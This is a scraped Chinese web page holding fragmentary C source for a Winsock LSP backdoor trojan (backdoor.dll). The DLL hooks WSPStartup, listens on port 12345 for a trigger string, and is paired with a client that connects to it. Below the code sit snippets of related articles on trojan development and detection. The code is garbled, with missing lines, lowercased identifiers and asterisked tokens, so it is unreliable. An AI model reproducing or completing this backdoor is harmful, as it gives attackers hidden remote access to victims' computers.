/n");
printf("date: 11-3-2002/n/n");
return ;
}void usage()
2.backdoor.dll的源**
#pragma data_seg("shared")
int dllcount=0;
#pragma data_seg()
#pragma ***ment (linker,"/section:shared,rws")
#define unicode
#define _unicode
#include
#include
#include
guid filterguid=};
lpwsaprotocol_infow protoinfo=null;
wspproc_table nextproctable;
dword protoinfosize=0;
handle hmutex;
handle hthread;
point nowpt;
int totalprotos=0;
dword winapi backdoor(lpvoid)
if((sock=socket(af_i***,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=htons(inaddr_any);
sin.sin_family=af_i***;
sin.sin_port=htons(12345);
if(bind(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if(listen(sock,5)==socket_error)
while(1)
if((iret==recv(sockt,msg,sizeof(msg),0))==socket_error)
if(strstr(msg,"i am too2y"))
}outputdebugstring(_t("transport successfully"));
closesocket(sockt);
}return 1;
}bool getfilter()
}if((protoinfo=(lpwsaprotocol_infow)globalalloc(gptr,protoinfosize))==null)
if((totalprotos=wscenumprotocols(null,protoinfo,&protoinfosize,&errorcode))==socket_error)
return true;
}void freefilter()
bool winapi dllmain(hinstance hmodule,
dword reason,
lpvoid lpreserved)
releasemutex(hmutex);
break;
}case dll_process_detach:
releasemutex(hmutex);
closehandle(hthread);
break;}}
return true;
}int wspapi wspstartup(
word wversionrequested,
lpwspdata lpwspdata,
lpwsaprotocol_infow lpprotoinfo,
wspupcalltable upcalltable,
lpwspproc_table lpproctable)
getfilter();
for(i=0;iprotocolchain.chainlen;i++)
}filterpathlen=max_path;
filterpath=(tchar*)globalalloc(gptr,filterpathlen);
for(i=0;i
#include
#include
int main()
if((sock=socket(af_i***,sock_stream,ipproto_tcp))==invalid_socket)
sin.sin_addr.s_addr=i***_addr("127.0.0.1");
sin.sin_family=af_i***;
sin.sin_port=htons(12345);
if(connect(sock,(struct sockaddr *)&sin,sizeof(sin))==socket_error)
if((iret=send(sock,msg,sizeof(msg),0))==socket_error)
memset(msg,0,sizeof(msg));
if((iret=recv(sock,msg,sizeof(msg),0))==socket_error)
printf("re: ");
printf(msg);
closesocket(sock);
wsacleanup();
getche();
return 0;
}
無dll無程序木馬
include include include include pragma comment lib,shlwapi.lib 引數結構 typedef struct remotepararemotepara bool enableprivilege handle htoken,lpctstr szp...
無程序DLL木馬開發思路與實現
code 1.instbd.exe的源 define unicode define unicode include include include include include guid filterguid guid filterchainguid bool getfilter void fre...
無dll插入程序
mini code by kardinal p.s.t compile by vc 6.0 can not run under win98 include pragma comment lib,user32.lib pragma comment lib,kernel32.lib pragma com...
使用DLL技術的木馬分析
使用就相當方便,可以有效的查殺木馬。另外建議大家使用專門針對木馬的查殺軟體,如木馬克星。2 使用程序 記憶體模組檢視器 dll木馬對於程序管理器來說是隱藏的,所以我們既不能用程序管理器來查詢,也無法直接將它停止執行,因此,我們不能指望nt自帶的程序管理器了,需要使用一些附加的工具。為了能發現dll木...
謹防淪為DLL後門木馬及其變種的肉雞
卡巴斯基實驗室近期發現有一種名為 dll後門木馬 的惡意軟體活動比較頻繁。該木馬採用delphi語言編寫,未加殼,但其具有偽造的數字簽名,而且其變種竟然高達390多種。此木馬主要通過網頁掛馬等方式感染使用者計算機,危害性比較大。一旦感染,它會釋放一個名稱隨機的dll檔案到使用者計算機的系統目錄,以服...